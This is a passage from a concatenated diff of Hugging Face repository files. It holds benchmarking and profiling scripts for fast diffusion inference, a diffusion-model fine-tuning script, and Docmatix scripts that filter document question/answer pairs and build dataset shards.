+ dataset[split] = pitch_dataset[split].add_column('snr', snr_dataset[split]['snr']).add_column('c50', snr_dataset[split]['c50'])
206
+ if 'speech_duration' in snr_dataset[split]:
207
+ dataset[split] = dataset[split].add_column('speech_duration', snr_dataset[split]['speech_duration'])
208
+ dataset[split] = dataset[split].add_column('speaking_rate', rate_dataset[split]['speaking_rate']).add_column('phonemes', rate_dataset[split]['phonemes'])
209
+ if args.apply_squim_quality_estimation:
210
+ dataset[split] = dataset[split].add_column('stoi', squim_dataset[split]['stoi']).add_column('si-sdr', squim_dataset[split]['sdr']).add_column('pesq', squim_dataset[split]['pesq'])
211
+ if args.output_dir:
212
+ print('Saving to disk...')
213
+ dataset.save_to_disk(args.output_dir)
214
+ if args.repo_id:
215
+ print('Pushing to the hub...')
216
+ if args.configuration:
217
+ dataset.push_to_hub(args.repo_id, args.configuration)
218
+ else:
219
+ dataset.push_to_hub(args.repo_id)
220
+
huggingface_datatrove.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_diffusers.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_diffusion-fast.txt ADDED
@@ -0,0 +1,160 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: diffusion-fast-main/prepare_results.py
2
+ import argparse
3
+ import glob
4
+ import os
5
+ import sys
6
+ import matplotlib.pyplot as plt
7
+ import pandas as pd
8
+ import seaborn as sns
9
+ from huggingface_hub import upload_file
10
+ sys.path.append('.')
11
+ from utils.benchmarking_utils import collate_csv
12
+ REPO_ID = 'sayakpaul/sample-datasets'
13
+
14
+ def prepare_plot(df, args):
15
+ columns_to_drop = ['batch_size', 'num_inference_steps', 'pipeline_cls', 'ckpt_id', 'upcast_vae', 'memory (gbs)', 'actual_gpu_memory (gbs)', 'tag']
16
+ df_filtered = df.drop(columns=columns_to_drop)
17
+ df_filtered[['quant']] = df_filtered[['do_quant']].fillna('None')
18
+ df_filtered.drop(columns=['do_quant'], inplace=True)
19
+ df_filtered['settings'] = df_filtered.apply(lambda row: ', '.join([f'{col}-{row[col]}' for col in df_filtered.columns if col != 'time (secs)']), axis=1)
20
+ df_filtered['formatted_settings'] = df_filtered['settings'].str.replace(', ', '\n', regex=False)
21
+ df_filtered.loc[0, 'formatted_settings'] = 'default'
22
+ plt.figure(figsize=(12, 10))
23
+ sns.set_style('whitegrid')
24
+ n_settings = len(df_filtered['formatted_settings'].unique())
25
+ bar_positions = range(n_settings)
26
+ palette = sns.color_palette('husl', n_settings)
27
+ bar_width = 0.25
28
+ for (i, setting) in enumerate(df_filtered['formatted_settings'].unique()):
29
+ mean_time = df_filtered[df_filtered['formatted_settings'] == setting]['time (secs)'].mean()
30
+ plt.bar(i, mean_time, width=bar_width, align='center', color=palette[i])
31
+ plt.text(i, mean_time + 0.01, f'{mean_time:.2f}', ha='center', va='bottom', fontsize=14, fontweight='bold')
32
+ plt.xticks(bar_positions, df_filtered['formatted_settings'].unique(), rotation=45, ha='right', fontsize=10)
33
+ plt.ylabel('Time in Seconds', fontsize=14, labelpad=15)
34
+ plt.xlabel('Settings', fontsize=14, labelpad=15)
35
+ plt.title(args.plot_title, fontsize=18, fontweight='bold', pad=20)
36
+ plt.grid(axis='y', linestyle='--', linewidth=0.7, alpha=0.7)
37
+ plt.tight_layout()
38
+ plt.subplots_adjust(top=0.9, bottom=0.2)
39
+ plot_path = args.plot_title.replace(' ', '_') + '.png'
40
+ plt.savefig(plot_path, bbox_inches='tight', dpi=300)
41
+ if args.push_to_hub:
42
+ upload_file(repo_id=REPO_ID, path_in_repo=plot_path, path_or_fileobj=plot_path, repo_type='dataset')
43
+ print(f'Plot successfully uploaded. Find it here: https://huggingface.co/datasets/{REPO_ID}/blob/main/{args.plot_file_path}')
44
+ plt.show()
45
+
46
+ def main(args):
47
+ all_csvs = sorted(glob.glob(f'{args.base_path}/*.csv'))
48
+ all_csvs = [os.path.join(args.base_path, x) for x in all_csvs]
49
+ is_pixart = 'PixArt-alpha' in all_csvs[0]
50
+ collate_csv(all_csvs, args.final_csv_filename, is_pixart=is_pixart)
51
+ if args.push_to_hub:
52
+ upload_file(repo_id=REPO_ID, path_in_repo=args.final_csv_filename, path_or_fileobj=args.final_csv_filename, repo_type='dataset')
53
+ print(f'CSV successfully uploaded. Find it here: https://huggingface.co/datasets/{REPO_ID}/blob/main/{args.final_csv_filename}')
54
+ if args.plot_title is not None:
55
+ df = pd.read_csv(args.final_csv_filename)
56
+ prepare_plot(df, args)
57
+ if __name__ == '__main__':
58
+ parser = argparse.ArgumentParser()
59
+ parser.add_argument('--base_path', type=str, default='.')
60
+ parser.add_argument('--final_csv_filename', type=str, default='collated_results.csv')
61
+ parser.add_argument('--plot_title', type=str, default=None)
62
+ parser.add_argument('--push_to_hub', action='store_true')
63
+ args = parser.parse_args()
64
+ main(args)
65
+
66
+ # File: diffusion-fast-main/run_benchmark.py
67
+ import torch
68
+ torch.set_float32_matmul_precision('high')
69
+ import sys
70
+ sys.path.append('.')
71
+ from utils.benchmarking_utils import benchmark_fn, create_parser, generate_csv_dict, write_to_csv
72
+ from utils.pipeline_utils import load_pipeline
73
+
74
+ def run_inference(pipe, args):
75
+ _ = pipe(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size)
76
+
77
+ def main(args) -> dict:
78
+ pipeline = load_pipeline(ckpt=args.ckpt, compile_unet=args.compile_unet, compile_vae=args.compile_vae, no_sdpa=args.no_sdpa, no_bf16=args.no_bf16, upcast_vae=args.upcast_vae, enable_fused_projections=args.enable_fused_projections, do_quant=args.do_quant, compile_mode=args.compile_mode, change_comp_config=args.change_comp_config, device=args.device)
79
+ run_inference(pipeline, args)
80
+ run_inference(pipeline, args)
81
+ run_inference(pipeline, args)
82
+ time = benchmark_fn(run_inference, pipeline, args)
83
+ data_dict = generate_csv_dict(pipeline_cls=str(pipeline.__class__.__name__), args=args, time=time)
84
+ img = pipeline(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size).images[0]
85
+ return (data_dict, img)
86
+ if __name__ == '__main__':
87
+ parser = create_parser()
88
+ args = parser.parse_args()
89
+ print(args)
90
+ (data_dict, img) = main(args)
91
+ name = args.ckpt.replace('/', '_') + f'bf16@{not args.no_bf16}-sdpa@{not args.no_sdpa}-bs@{args.batch_size}-fuse@{args.enable_fused_projections}-upcast_vae@{args.upcast_vae}-steps@{args.num_inference_steps}-unet@{args.compile_unet}-vae@{args.compile_vae}-mode@{args.compile_mode}-change_comp_config@{args.change_comp_config}-do_quant@{args.do_quant}-tag@{args.tag}-device@{args.device}.csv'
92
+ img.save(f"{name.replace('.csv', '')}.jpeg")
93
+ write_to_csv(name, data_dict)
94
+
95
+ # File: diffusion-fast-main/run_benchmark_pixart.py
96
+ import torch
97
+ torch.set_float32_matmul_precision('high')
98
+ import sys
99
+ sys.path.append('.')
100
+ from utils.benchmarking_utils import benchmark_fn, create_parser, generate_csv_dict, write_to_csv
101
+ from utils.pipeline_utils_pixart import load_pipeline
102
+
103
+ def run_inference(pipe, args):
104
+ _ = pipe(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size)
105
+
106
+ def main(args) -> dict:
107
+ pipeline = load_pipeline(ckpt=args.ckpt, compile_transformer=args.compile_transformer, compile_vae=args.compile_vae, no_sdpa=args.no_sdpa, no_bf16=args.no_bf16, enable_fused_projections=args.enable_fused_projections, do_quant=args.do_quant, compile_mode=args.compile_mode, change_comp_config=args.change_comp_config, device=args.device)
108
+ run_inference(pipeline, args)
109
+ run_inference(pipeline, args)
110
+ run_inference(pipeline, args)
111
+ time = benchmark_fn(run_inference, pipeline, args)
112
+ data_dict = generate_csv_dict(pipeline_cls=str(pipeline.__class__.__name__), args=args, time=time)
113
+ img = pipeline(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size).images[0]
114
+ return (data_dict, img)
115
+ if __name__ == '__main__':
116
+ parser = create_parser(is_pixart=True)
117
+ args = parser.parse_args()
118
+ print(args)
119
+ (data_dict, img) = main(args)
120
+ name = args.ckpt.replace('/', '_') + f'bf16@{not args.no_bf16}-sdpa@{not args.no_sdpa}-bs@{args.batch_size}-fuse@{args.enable_fused_projections}-upcast_vae@NA-steps@{args.num_inference_steps}-transformer@{args.compile_transformer}-vae@{args.compile_vae}-mode@{args.compile_mode}-change_comp_config@{args.change_comp_config}-do_quant@{args.do_quant}-tag@{args.tag}-device@{args.device}.csv'
121
+ img.save(f'{name}.jpeg')
122
+ write_to_csv(name, data_dict, is_pixart=True)
123
+
124
+ # File: diffusion-fast-main/run_profile.py
125
+ import torch
126
+ torch.set_float32_matmul_precision('high')
127
+ from torch._inductor import config as inductorconfig
128
+ inductorconfig.triton.unique_kernel_names = True
129
+ import functools
130
+ import sys
131
+ sys.path.append('.')
132
+ from utils.benchmarking_utils import create_parser
133
+ from utils.pipeline_utils import load_pipeline
134
+
135
+ def profiler_runner(path, fn, *args, **kwargs):
136
+ with torch.profiler.profile(activities=[torch.profiler.ProfilerActivity.CPU, torch.profiler.ProfilerActivity.CUDA], record_shapes=True) as prof:
137
+ result = fn(*args, **kwargs)
138
+ prof.export_chrome_trace(path)
139
+ return result
140
+
141
+ def run_inference(pipe, args):
142
+ _ = pipe(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size)
143
+
144
+ def main(args) -> dict:
145
+ pipeline = load_pipeline(ckpt=args.ckpt, compile_unet=args.compile_unet, compile_vae=args.compile_vae, no_sdpa=args.no_sdpa, no_bf16=args.no_bf16, upcast_vae=args.upcast_vae, enable_fused_projections=args.enable_fused_projections, do_quant=args.do_quant, compile_mode=args.compile_mode, change_comp_config=args.change_comp_config, device=args.device)
146
+ run_inference(pipeline, args)
147
+ run_inference(pipeline, args)
148
+ trace_path = args.ckpt.replace('/', '_') + f'bf16@{not args.no_bf16}-sdpa@{not args.no_sdpa}-bs@{args.batch_size}-fuse@{args.enable_fused_projections}-upcast_vae@{args.upcast_vae}-steps@{args.num_inference_steps}-unet@{args.compile_unet}-vae@{args.compile_vae}-mode@{args.compile_mode}-change_comp_config@{args.change_comp_config}-do_quant@{args.do_quant}-device@{args.device}.json'
149
+ runner = functools.partial(profiler_runner, trace_path)
150
+ with torch.autograd.profiler.record_function('sdxl-brrr'):
151
+ runner(run_inference, pipeline, args)
152
+ return trace_path
153
+ if __name__ == '__main__':
154
+ parser = create_parser()
155
+ args = parser.parse_args()
156
+ if not args.compile_unet:
157
+ args.compile_mode = 'NA'
158
+ trace_path = main(args)
159
+ print(f'Trace generated at: {trace_path}')
160
+
huggingface_diffusion-models-class.txt ADDED
@@ -0,0 +1,62 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: diffusion-models-class-main/unit2/finetune_model.py
2
+ import wandb
3
+ import numpy as np
4
+ import torch, torchvision
5
+ import torch.nn.functional as F
6
+ from PIL import Image
7
+ from tqdm.auto import tqdm
8
+ from fastcore.script import call_parse
9
+ from torchvision import transforms
10
+ from diffusers import DDPMPipeline
11
+ from diffusers import DDIMScheduler
12
+ from datasets import load_dataset
13
+ from matplotlib import pyplot as plt
14
+
15
+ @call_parse
16
+ def train(image_size=256, batch_size=16, grad_accumulation_steps=2, num_epochs=1, start_model='google/ddpm-bedroom-256', dataset_name='huggan/wikiart', device='cuda', model_save_name='wikiart_1e', wandb_project='dm_finetune', log_samples_every=250, save_model_every=2500):
17
+ wandb.init(project=wandb_project, config=locals())
18
+ image_pipe = DDPMPipeline.from_pretrained(start_model)
19
+ image_pipe.to(device)
20
+ sampling_scheduler = DDIMScheduler.from_config(start_model)
21
+ sampling_scheduler.set_timesteps(num_inference_steps=50)
22
+ dataset = load_dataset(dataset_name, split='train')
23
+ preprocess = transforms.Compose([transforms.Resize((image_size, image_size)), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.5], [0.5])])
24
+
25
+ def transform(examples):
26
+ images = [preprocess(image.convert('RGB')) for image in examples['image']]
27
+ return {'images': images}
28
+ dataset.set_transform(transform)
29
+ train_dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
30
+ optimizer = torch.optim.AdamW(image_pipe.unet.parameters(), lr=1e-05)
31
+ scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.9)
32
+ for epoch in range(num_epochs):
33
+ for (step, batch) in tqdm(enumerate(train_dataloader), total=len(train_dataloader)):
34
+ clean_images = batch['images'].to(device)
35
+ noise = torch.randn(clean_images.shape).to(clean_images.device)
36
+ bs = clean_images.shape[0]
37
+ timesteps = torch.randint(0, image_pipe.scheduler.num_train_timesteps, (bs,), device=clean_images.device).long()
38
+ noisy_images = image_pipe.scheduler.add_noise(clean_images, noise, timesteps)
39
+ noise_pred = image_pipe.unet(noisy_images, timesteps, return_dict=False)[0]
40
+ loss = F.mse_loss(noise_pred, noise)
41
+ wandb.log({'loss': loss.item()})
42
+ loss.backward()
43
+ if (step + 1) % grad_accumulation_steps == 0:
44
+ optimizer.step()
45
+ optimizer.zero_grad()
46
+ if (step + 1) % log_samples_every == 0:
47
+ x = torch.randn(8, 3, 256, 256).to(device)
48
+ for (i, t) in tqdm(enumerate(sampling_scheduler.timesteps)):
49
+ model_input = sampling_scheduler.scale_model_input(x, t)
50
+ with torch.no_grad():
51
+ noise_pred = image_pipe.unet(model_input, t)['sample']
52
+ x = sampling_scheduler.step(noise_pred, t, x).prev_sample
53
+ grid = torchvision.utils.make_grid(x, nrow=4)
54
+ im = grid.permute(1, 2, 0).cpu().clip(-1, 1) * 0.5 + 0.5
55
+ im = Image.fromarray(np.array(im * 255).astype(np.uint8))
56
+ wandb.log({'Sample generations': wandb.Image(im)})
57
+ if (step + 1) % save_model_every == 0:
58
+ image_pipe.save_pretrained(model_save_name + f'step_{step + 1}')
59
+ scheduler.step()
60
+ image_pipe.save_pretrained(model_save_name)
61
+ wandb.finish()
62
+
huggingface_distil-whisper.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_docmatix.txt ADDED
@@ -0,0 +1,604 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: docmatix-main/analysis/count_words_in_dataset.py
2
+ from collections import Counter
3
+ import string
4
+
5
+ def count_words(df, column_name):
6
+ overall_counter = Counter()
7
+ word_counts = []
8
+ for text in df[column_name]:
9
+ text = text.translate(str.maketrans(string.punctuation, ' ' * len(string.punctuation)))
10
+ words = text.lower().split()
11
+ word_count = len(words)
12
+ word_counts.append(word_count)
13
+ overall_counter.update(words)
14
+ df['word_count'] = word_counts
15
+ most_common_words = overall_counter.most_common(100)
16
+ return (df, most_common_words)
17
+
18
+ # File: docmatix-main/analysis/plot.py
19
+ import matplotlib.pyplot as plt
20
+ import pandas as pd
21
+ import seaborn as sns
22
+ analysis_df = pd.read_json('prompt_analysis_results.json', orient='records', lines=True)
23
+ sns.set(style='whitegrid')
24
+ plt.figure(figsize=(16, 12))
25
+ plt.subplot(3, 2, 1)
26
+ sns.barplot(x='Prompt ID', y='Number of Q/A pairs', data=analysis_df, palette='viridis')
27
+ plt.title('Number of Q/A pairs per Prompt ID')
28
+ plt.xlabel('Prompt ID')
29
+ plt.ylabel('Number of Q/A pairs')
30
+ for (i, row) in analysis_df.iterrows():
31
+ plt.text(i, row['Number of Q/A pairs'], f"{row['Number of Q/A pairs'] / 1000000.0:.2f}e6", ha='center', va='bottom')
32
+ plt.subplot(3, 2, 2)
33
+ sns.barplot(x='Prompt ID', y='Average answer length', data=analysis_df, palette='viridis')
34
+ plt.title('Average Answer Length per Prompt ID')
35
+ plt.xlabel('Prompt ID')
36
+ plt.ylabel('Average Answer Length')
37
+ for (i, row) in analysis_df.iterrows():
38
+ plt.text(i, row['Average answer length'], f"{row['Average answer length']:.2f}", ha='center', va='bottom')
39
+ plt.subplot(3, 2, 3)
40
+ sns.barplot(x='Prompt ID', y='Diversity within documents', data=analysis_df, palette='viridis')
41
+ plt.title('Diversity within Documents per Prompt ID')
42
+ plt.xlabel('Prompt ID')
43
+ plt.ylabel('Diversity within Documents')
44
+ for (i, row) in analysis_df.iterrows():
45
+ plt.text(i, row['Diversity within documents'], f"{row['Diversity within documents']:.2f}", ha='center', va='bottom')
46
+ plt.subplot(3, 2, 4)
47
+ sns.barplot(x='Prompt ID', y='Total empty questions', data=analysis_df, palette='viridis')
48
+ plt.title('Total Empty Questions per Prompt ID')
49
+ plt.xlabel('Prompt ID')
50
+ plt.ylabel('Total Empty Questions')
51
+ for (i, row) in analysis_df.iterrows():
52
+ plt.text(i, row['Total empty questions'], f"{row['Total empty questions']}", ha='center', va='bottom')
53
+ plt.subplot(3, 2, 5)
54
+ sns.barplot(x='Prompt ID', y='Average Q/A pairs per page', data=analysis_df, palette='viridis')
55
+ plt.title('Average Q/A pairs per Page per Prompt ID')
56
+ plt.xlabel('Prompt ID')
57
+ plt.ylabel('Average Q/A pairs per Page')
58
+ for (i, row) in analysis_df.iterrows():
59
+ plt.text(i, row['Average Q/A pairs per page'], f"{row['Average Q/A pairs per page']:.2f}", ha='center', va='bottom')
60
+ plt.subplot(3, 2, 6)
61
+ sns.barplot(x='Prompt ID', y='Number of unique questions', data=analysis_df, palette='viridis')
62
+ plt.title('Number of unique questions per Prompt ID')
63
+ plt.xlabel('Prompt ID')
64
+ plt.ylabel('Number of unique questions')
65
+ for (i, row) in analysis_df.iterrows():
66
+ plt.text(i, row['Number of unique questions'], f"{row['Number of unique questions'] / 1000000.0:.2f}e6", ha='center', va='bottom')
67
+ plt.tight_layout()
68
+ plt.savefig('prompt_analysis_plots_enhanced.png')
69
+ plt.show()
70
+ report = f"\nPrompt Analysis Report\n=======================\nNumber of Q/A pairs per Prompt ID:\n{analysis_df[['Prompt ID', 'Number of Q/A pairs']]}\n\nAverage answer length per Prompt ID:\n{analysis_df[['Prompt ID', 'Average answer length']]}\n\nUnique questions per Prompt ID:\n{analysis_df[['Prompt ID', 'Number of unique questions']]}\n\nTotal pages per Prompt ID:\n{analysis_df[['Prompt ID', 'Total pages']]}\n\nAverage Q/A pairs per page per Prompt ID:\n{analysis_df[['Prompt ID', 'Average Q/A pairs per page']]}\n\nAverage answer length per page per Prompt ID:\n{analysis_df[['Prompt ID', 'Average answer length per page']]}\n\nDiversity within documents per Prompt ID:\n{analysis_df[['Prompt ID', 'Diversity within documents']]}\n\nTotal empty questions per Prompt ID:\n{analysis_df[['Prompt ID', 'Total empty questions']]}\n\n"
71
+ with open('prompt_analysis_report.txt', 'w') as f:
72
+ f.write(report)
73
+ print('Report and plots generated successfully.')
74
+
75
+ # File: docmatix-main/clean_and_create/load_data.py
76
+ import os
77
+ import re
78
+ import io
79
+ from io import BytesIO
80
+ import pandas as pd
81
+ import datasets
82
+ from pdf2image import convert_from_bytes
83
+ from tqdm import tqdm
84
+ from concurrent.futures import ThreadPoolExecutor
85
+ import argparse
86
+ import fitz
87
+ import PIL.Image
88
+ tqdm.pandas(desc='Pandas apply progress')
89
+ fitz.TOOLS.mupdf_display_errors(False)
90
+ DATA_PATH = '/fsx/andi/pdfa_data/'
91
+ TAR_FILE_PATTERN = 'pdfa-eng-train-{:06d}.tar'
92
+
93
+ def resize_large_images(image, max_image_size=2940):
94
+ (width, height) = image.size
95
+ aspect_ratio = width / height
96
+ resized = False
97
+ if width >= height and width > max_image_size:
98
+ width = max_image_size
99
+ height = int(width / aspect_ratio)
100
+ resized = True
101
+ elif height > width and height > max_image_size:
102
+ height = max_image_size
103
+ width = int(height * aspect_ratio)
104
+ resized = True
105
+ if resized:
106
+ image = image.resize((width, height), PIL.Image.LANCZOS)
107
+ return image
108
+
109
+ def _decode_pdf_pages(sample):
110
+ try:
111
+ image_fmt = 'L'
112
+ with io.BytesIO(sample) as b:
113
+ doc = fitz.Document(stream=b)
114
+ num_image_pages = doc.page_count
115
+ decoded_image_pages = []
116
+ for page_index in range(num_image_pages):
117
+ page = doc.load_page(page_index)
118
+ pixmap = page.get_pixmap(dpi=150)
119
+ page_image = PIL.Image.frombuffer('RGB', (pixmap.width, pixmap.height), pixmap.samples)
120
+ page_image = resize_large_images(page_image.convert(image_fmt))
121
+ decoded_image_pages += [page_image]
122
+ return decoded_image_pages
123
+ except Exception as e:
124
+ print(f'Error decoding pdf pages: {e}')
125
+ return None
126
+
127
+ def convert_img_to_png_bytes(img):
128
+ with BytesIO() as buffer:
129
+ img.save(buffer, format='PNG')
130
+ return buffer.getvalue()
131
+
132
+ def process_images(pdf_bytes):
133
+ images = convert_from_bytes(pdf_bytes, dpi=150)
134
+ return [convert_img_to_png_bytes(resize_large_images(img)) for img in images]
135
+
136
+ def is_valid_question_or_answer(text):
137
+ if not text or text.strip() == '':
138
+ return False
139
+ patterns = ['\\{.*?\\}', '\\[.*?\\]', '<.*?>', '\\b\\d{1,3}(\\.\\d{1,3}){3}\\b', '\\w+\\.\\w+', '\\n\\s*\\n', 'unanswerable', 'Q\\d+: ', 'A\\d+: ']
140
+ return not any((re.search(pattern, text, re.IGNORECASE) for pattern in patterns))
141
+
142
+ def process_group(key_group):
143
+ try:
144
+ (key, group) = key_group
145
+ qa_pairs = []
146
+ for (_, row) in group.iterrows():
147
+ question = re.sub('^Q\\d+: ', '', row['question'])
148
+ answer = re.sub('^A\\d+: ', '', row['answer'])
149
+ if is_valid_question_or_answer(question) and is_valid_question_or_answer(answer):
150
+ qa_pairs.append({'user': question, 'assistant': answer, 'source': 'PDFA key: ' + str(row['__key__'])})
151
+ if qa_pairs:
152
+ return {'texts': qa_pairs, 'images': group['pdf'].iloc[0]}
153
+ except Exception as e:
154
+ print(f'Error processing group {key}: {e}')
155
+ return None
156
+
157
+ def process_tar_index(tar_index, step_size, question_answer_df):
158
+ shard_nr = tar_index // step_size
159
+ loaded_datasets = []
160
+ for inner_idx in range(step_size):
161
+ tar_file = os.path.join(DATA_PATH, TAR_FILE_PATTERN.format(tar_index + inner_idx))
162
+ try:
163
+ print(f'Loading dataset from: {tar_file}')
164
+ hf_dataset = datasets.load_dataset('webdataset', split='train', data_files=tar_file, cache_dir='/fsx/.cache').to_pandas()
165
+ hf_dataset.__key__ = hf_dataset.__key__.apply(pd.to_numeric)
166
+ loaded_datasets.append(hf_dataset)
167
+ except Exception as e:
168
+ print(f'Error loading dataset from: {tar_file}')
169
+ print(e)
170
+ hf_dataset = pd.concat(loaded_datasets, ignore_index=True)
171
+ print(f'Concatenated datasets with {len(hf_dataset)} samples')
172
+ hf_dataset = hf_dataset[hf_dataset['__key__'].isin(question_answer_df['__key__'].unique())]
173
+ df_data = pd.DataFrame({'key': []})
174
+ if os.path.exists(f'/fsx/m4/datasets/large_docvqa/shard_{shard_nr}'):
175
+ print('using saved data')
176
+ df_data = datasets.load_from_disk(f'/fsx/m4/datasets/large_docvqa/shard_{shard_nr}').to_pandas()
177
+ df_data['__key__'] = df_data.texts.apply(lambda x: x[0]['source'].split('_')[1])
178
+ df_data['__key__'] = df_data['__key__'].apply(pd.to_numeric)
179
+ df_data.drop(columns=['texts'], inplace=True)
180
+ hf_dataset = hf_dataset[hf_dataset['__key__'].isin(df_data['__key__'].unique())]
181
+ hf_dataset = pd.merge(hf_dataset, df_data, on='__key__', how='inner')
182
+ hf_dataset['pdf'] = hf_dataset['images']
183
+ hf_dataset.drop(columns=['images'], inplace=True)
184
+ del df_data
185
+ else:
186
+ hf_dataset['pdf'] = hf_dataset['pdf'].progress_apply(lambda x: process_images(x))
187
+ hf_dataset = hf_dataset[~hf_dataset['pdf'].isnull()]
188
+ merged_df = pd.merge(hf_dataset, question_answer_df, on='__key__', how='inner')
189
+ data_extracted = []
190
+ max_threads = 10
191
+ with ThreadPoolExecutor(max_threads) as executor:
192
+ results = list(tqdm(executor.map(process_group, merged_df.groupby('__key__')), desc='Extracting data', total=len(merged_df['__key__'].unique())))
193
+ data_extracted.extend(results)
194
+ data_extracted = list(filter(lambda item: item is not None, data_extracted))
195
+ FEATURES = datasets.Features({'images': datasets.Sequence(datasets.Image(decode=True)), 'texts': [{'user': datasets.Value('string'), 'assistant': datasets.Value('string'), 'source': datasets.Value('string')}]})
196
+
197
+ def data_generator():
198
+ for data_dict in data_extracted:
199
+ yield data_dict
200
+ ds_shard = datasets.Dataset.from_generator(data_generator, features=FEATURES, writer_batch_size=100, cache_dir='/fsx/.cache')
201
+ ds_shard.save_to_disk(f'/fsx/m4/datasets/docvqa_instruct/shard_{shard_nr}')
202
+
203
+ def load_and_concatenate_dataframes():
204
+ if os.path.exists('concatenated_synthetic_dataset.parquet.gzip'):
205
+ return pd.read_parquet('concatenated_synthetic_dataset.parquet.gzip')
206
+ directory = '.'
207
+ all_files = os.listdir(directory)
208
+ h5_files = sorted([f for f in all_files if re.match('synthetic_dataset_batch_\\d+\\.h5$', f)])
209
+ dataframes = []
210
+ for file in tqdm(h5_files, desc='Loading data'):
211
+ file_path = os.path.join(directory, file)
212
+ df = pd.read_hdf(file_path)
213
+ if '__key__' not in df.columns:
214
+ raise ValueError(f'Key column not found in {file_path}')
215
+ df.__key__ = df.__key__.apply(pd.to_numeric)
216
+ dataframes.append(df)
217
+ concatenated_df = pd.concat(dataframes, ignore_index=True)
218
+ concatenated_df.to_parquet('concatenated_synthetic_dataset.parquet.gzip', compression='gzip')
219
+ return concatenated_df
220
+ if __name__ == '__main__':
221
+ parser = argparse.ArgumentParser(description='Process .h5 files and tar indices.')
222
+ parser.add_argument('--start_index', type=int, default=0, help='The starting index for tar processing.')
223
+ parser.add_argument('--step_size', type=int, default=1, help='The step size for tar processing.')
224
+ args = parser.parse_args()
225
+ question_answer_df = load_and_concatenate_dataframes()
226
+ print(len(question_answer_df))
227
+ process_tar_index(args.start_index, args.step_size, question_answer_df=question_answer_df)
228
+
229
+ # File: docmatix-main/create_only_with_pdfs/load_data.py
230
+ import os
231
+ import re
232
+ import pandas as pd
233
+ import datasets
234
+ from tqdm import tqdm
235
+ from concurrent.futures import ThreadPoolExecutor
236
+ import argparse
237
+ tqdm.pandas(desc='Pandas apply progress')
238
+ DATA_PATH = '/fsx/andi/pdfa_data/'
239
+ TAR_FILE_PATTERN = 'pdfa-eng-train-{:06d}.tar'
240
+
241
+ def is_valid_question_or_answer(text):
242
+ if not text or text.strip() == '':
243
+ return False
244
+ patterns = ['\\{.*?\\}', '\\[.*?\\]', '<.*?>', '\\b\\d{1,3}(\\.\\d{1,3}){3}\\b', '\\w+\\.\\w+', '\\n\\s*\\n', 'unanswerable', 'Q\\d+: ', 'A\\d+: ']
245
+ return not any((re.search(pattern, text, re.IGNORECASE) for pattern in patterns))
